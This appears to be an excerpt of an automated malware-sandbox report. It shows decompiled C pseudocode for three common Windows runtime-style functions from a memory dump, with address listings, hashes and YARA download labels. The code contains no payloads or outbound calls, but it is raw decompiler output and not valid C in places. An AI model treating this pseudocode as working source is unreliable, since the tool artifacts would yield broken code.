				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x49cd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0491D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E048F2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L048F4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0491F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E048EFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x49cb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0491B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x04905142
0x0490514c
0x04905150
0x04905157
0x04905159
0x0490515e
0x04905165
0x04905169
0x0490516c
0x04905172
0x04905176
0x0490517a
0x0490517a
0x0490517a
0x0490517f
0x04946d8b
0x04946d8e
0x04946d91
0x04946d95
0x04946d98
0x04946d9c
0x04946da0
0x04946da3
0x04946da7
0x04946e26
0x04946e26
0x04946e2a
0x049051f9
0x049051f9
0x049051fe
0x04946e33
0x04946e33
0x04946e39
0x04946e3d
0x04946e46
0x04946e50
0x00000000
0x00000000
0x04946e52
0x04946e53
0x04946e56
0x04946e5d
0x00000000
0x00000000
0x00000000
0x04946e5f
0x04946e67
0x04946e77
0x04946e7f
0x04946e80
0x04946e88
0x04946e90
0x04946e9f
0x04946ea5
0x04946ea9
0x04946eb1
0x04946ebf
0x00000000
0x00000000
0x04946ecf
0x04946ed3
0x00000000
0x00000000
0x04946edb
0x04946ede
0x04946ee1
0x04946ee8
0x04946eeb
0x04946eed
0x04946ef0
0x04946ef4
0x04946ef8
0x04946efc
0x00000000
0x00000000
0x04946f0d
0x04946f11
0x04946f32
0x04946f37
0x04946f3b
0x04946f3e
0x04946f41
0x04946f46
0x00000000
0x00000000
0x04946f4c
0x04946f50
0x04946f50
0x04946f54
0x04946f62
0x04946f65
0x04946f6d
0x04946f7b
0x04946f7b
0x04946f93
0x04946f98
0x04946fa0
0x04946fa6
0x04946fb3
0x04946fb6
0x04946fbf
0x04946fc1
0x04946fd5
0x04946fda
0x04946fda
0x04946fdd
0x04946fe2
0x04946fe7
0x04946feb
0x04946fef
0x04946ff3
0x0490520c
0x0490520c
0x0490520f
0x04905215
0x04905234
0x0490523a
0x0490523a
0x04905244
0x04905245
0x04905246
0x04905251
0x04905251
0x04946f13
0x04946f17
0x04946f17
0x04946f18
0x04946f1b
0x04946f1f
0x04946f23
0x00000000
0x04946f28
0x04905204
0x04905204
0x04905208
0x00000000
0x04905208
0x04905185
0x04905188
0x0490518a
0x0490518e
0x04905195
0x04946db1
0x04946db5
0x04946db9
0x0490519b
0x0490519b
0x0490519e
0x049051a7
0x049051a9
0x049051a9
0x049051b5
0x049051b8
0x049051bb
0x049051be
0x049051c1
0x049051c5
0x049051c9
0x049051cd
0x049051cd
0x049051d8
0x049051dc
0x049051e0
0x04946dcc
0x04946dd0
0x04946dd5
0x04946ddd
0x04946de1
0x04946de1
0x04946de5
0x04946deb
0x04946df1
0x04946df7
0x04946dfd
0x04946e01
0x04946e05
0x04946e09
0x04946e0d
0x04946e11
0x04946e11
0x049051eb
0x04946e1a
0x04946e1f
0x04946e21
0x04946e23
0x00000000
0x049051f1
0x049051f1
0x00000000
0x049051f1

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6d114911092508330ca9fae18fd8d7462f3b8a3dd3299dc03b27b6b78441020
Instruction ID: 249bc6c7c43eb1b24a8fd4c93bb179cc56716eca78b98c1d47006e5558021284
Opcode Fuzzy Hash: a6d114911092508330ca9fae18fd8d7462f3b8a3dd3299dc03b27b6b78441020
Instruction Fuzzy Hash: 74C133B55083809FD354CF28C480A5AFBE1BF89308F148A6EF8998B392D374E945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 049003E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E049003E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x49cd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04900548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0491B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E048EB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x49c7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E048F7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E048F7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04957016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04919830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E049569A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x49c7c04 != 0) {
						_t118 = _v12;
						_t120 = E0495A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x49c7bd8;
						if( *0x49c7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E049195D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E049199A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04953540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E048DB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0491AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x49c8474 - 3;
										if( *0x49c8474 != 3) {
											 *0x49c79dc =  *0x49c79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E048F7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E048F7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04957016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x49c8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x49c7b00; // 0x0
							asm("ror esi, cl");
							 *0x49cb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E049195D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E048E7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x049003f1
0x049003f7
0x049003f9
0x049003fb
0x049003fd
0x04900400
0x0490040a
0x04944c7a
0x04900537
0x04900547
0x04900410
0x04900410
0x04900414
0x04900417
0x0490041a
0x04900421
0x04900424
0x0490042b
0x0490043b
0x0490043e
0x0490043f
0x0490043f
0x04900446
0x04900449
0x0490044c
0x0490044f
0x04900459
0x04944c8d
0x0490045f
0x0490045f
0x0490045f
0x04900467
0x04944c97
0x04944c9d
0x04944ca4
0x04944caa
0x04944caf
0x04944cb1
0x04944cc3
0x04944cb3
0x04944cbc
0x04944cbc
0x04944cc8
0x04944ccb
0x04944cd7
0x04944cda
0x04944cdf
0x04944cdf
0x04944ccb
0x04944ca4
0x0490046d
0x0490046f
0x0490046f
0x04900471
0x04900476
0x0490047a
0x0490047b
0x04900483
0x04900489
0x0490048d
0x00000000
0x00000000
0x04944ce9
0x04944cef
0x04944d22
0x04944d22
0x00000000
0x04944d22
0x04944cf1
0x04944cf7
0x00000000
0x00000000
0x04944cf9
0x04944cff
0x00000000
0x00000000
0x04944d05
0x04944d07
0x00000000
0x00000000
0x04944d0d
0x04944d0f
0x04944d14
0x04944d16
0x00000000
0x00000000
0x04944d1c
0x04944d1c
0x04900499
0x04900535
0x04900535
0x00000000
0x04900535
0x049004a6
0x04944d2c
0x04944d37
0x04944d39
0x04944d3b
0x00000000
0x00000000
0x04944d41
0x04944d48
0x04900527
0x0490052b
0x0490052d
0x04900530
0x04900530
0x00000000
0x0490052b
0x04944d4e
0x049004ac
0x049004ac
0x049004af
0x049004b2
0x049004b7
0x049004b9
0x049004bb
0x049004bd
0x049004bf
0x049004c5
0x049004c9
0x04944d53
0x04944d59
0x04944db9
0x04944dba
0x04944dbf
0x04944dc2
0x04944dc4
0x04944dc7
0x04944dce
0x00000000
0x04944dce
0x04944d5b
0x04944d61
0x00000000
0x00000000
0x04944d63
0x04944d69
0x00000000
0x00000000
0x04944d6b
0x04944d6e
0x04944d74
0x04944d76
0x04944d7c
0x04944d7e
0x04944d84
0x04944d89
0x04944d8c
0x04944d8d
0x04944d92
0x04944d95
0x04944d96
0x04944d98
0x04944d9a
0x04944d9f
0x04944da4
0x04944da6
0x04944da8
0x04944daf
0x04944db1
0x04944db1
0x04944daf
0x04944da6
0x04944d84
0x04944d7c
0x00000000
0x04944d74
0x049004d6
0x04944de1
0x049004dc
0x049004dc
0x049004dc
0x049004e4
0x04944deb
0x04944df1
0x04944df8
0x04944dfe
0x04944e03
0x04944e05
0x04944e17
0x04944e07
0x04944e10
0x04944e10
0x04944e1c
0x04944e1f
0x04944e35
0x04944e35
0x04944e1f
0x04944df8
0x049004f1
0x049004fa
0x04944e3f
0x04944e47
0x04944e5b
0x04944e61
0x04944e67
0x04944e69
0x04944e71
0x04944e73
0x04900500
0x04900500
0x04900500
0x049004fa
0x04900508
0x0490051d
0x0490051d
0x0490051f
0x04900524
0x00000000
0x04900524
0x04900515
0x04900517
0x04944e7a
0x04944e7c
0x00000000
0x00000000
0x04944e85
0x00000000
0x04944e85
0x00000000
0x04900517

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d114f07978d3f1c3f71b30d17c52e5f8eb599e120b5ede0e1181dc59409763
Instruction ID: 793d75eb7b58a2394a17782db67e49be22177b691ce9235e33cb356855f14000
Opcode Fuzzy Hash: 12d114f07978d3f1c3f71b30d17c52e5f8eb599e120b5ede0e1181dc59409763
Instruction Fuzzy Hash: 22912731F00658AFEB319FA9D848FAD7BA9EB85724F054271E910AB2D1E774BD00C781

Uniqueness

Uniqueness Score: -1.00%

Function 048DC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E048DC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x49cd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E048E6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0491B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x49c7b9c; // 0x0
					_t74 = L048F4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04919650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L048F77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0491F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E049113C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L048F77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04919650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x048dc608
0x048dc615
0x048dc625
0x048dc62d
0x048dc635
0x048dc640
0x048dc680
0x048dc687
0x048dc688
0x048dc689
0x048dc694
0x048dc694
0x048dc642
0x048dc64a
0x048dc697
0x04947a25
0x04947a2b
0x04947a2e
0x04947a30
0x04947bea
0x04947bea
0x00000000
0x04947bea
0x04947a36
0x04947a43
0x04947a48
0x04947a4c
0x04947a4e
0x00000000
0x00000000
0x04947a58
0x04947a5a
0x04947a5b
0x04947a5c
0x04947a5d
0x04947a63
0x04947a64
0x04947a6a
0x04947a6c
0x04947a6e
0x049479cb
0x049479cb
0x049479ce
0x049479d0
0x04947a98
0x04947a9b
0x04947a9b
0x04947a9e
0x04947aa1
0x04947bbe
0x04947bbe
0x04947bc0
0x04947be0
0x04947be0
0x04947a01
0x04947a01
0x04947a05
0x04947a07
0x04947a15
0x04947a15
0x04947a1a
0x00000000
0x04947a1a
0x04947bc2
0x04947bc6
0x04947bc9
0x04947bcd
0x04947bcf
0x049479e6
0x049479e6
0x049479eb
0x049479eb
0x049479ef
0x049479f1
0x00000000
0x00000000
0x049479f3
0x049479f5
0x049479ff
0x049479ff
0x00000000
0x049479ff
0x049479f7
0x049479fd
0x00000000
0x00000000
0x00000000
0x049479fd
0x04947bd5
0x04947bd8
0x00000000
0x00000000
0x04947ba9
0x04947bac
0x04947bb0
0x04947bb1
0x04947bb1
0x04947bb6
0x00000000
0x04947bb6
0x04947aa7
0x04947aaa
0x00000000
0x00000000
0x04947ab2
0x04947ab3
0x04947ab5
0x04947aec
0x04947aef
0x04947b25
0x04947b28
0x04947b62
0x04947b64
0x04947b8f
0x04947b92
0x04947b96
0x04947b98
0x00000000
0x00000000
0x04947b9e
0x04947b9f
0x04947ba3
0x00000000
0x04947ba3
0x04947b66
0x04947b68
0x04947ae2
0x04947ae2
0x00000000
0x04947ae2
0x04947b6e
0x04947b72
0x04947b75
0x04947b81
0x04947b85
0x04947b87
0x00000000
0x00000000
0x04947b31
0x04947b34
0x04947b3c
0x04947b45
0x04947b46
0x04947b4f
0x04947b51
0x04947b57
0x04947b59
0x04947b59
0x00000000
0x04947b59
0x04947b77
0x00000000
0x04947b77
0x04947b2a
0x00000000
0x04947b2a
0x04947af1
0x04947af3
0x00000000
0x00000000
0x04947afb
0x04947afc
0x04947afe
0x00000000
0x00000000
0x04947b00
0x04947b03
0x00000000
0x00000000
0x04947b05
0x04947b09
0x04947b0d
0x04947b0f
0x00000000
0x00000000
0x04947b18
0x04947b1d
0x00000000
0x04947b1d
0x04947ab7
0x04947ab9
0x00000000
0x00000000
0x04947abf
0x04947ac1
0x00000000
0x00000000
0x04947ac3
0x04947ac6
0x00000000
0x00000000
0x04947ac8
0x04947acc
0x04947ad0
0x04947ad2
0x00000000
0x00000000
0x04947adb
0x00000000
0x04947adb
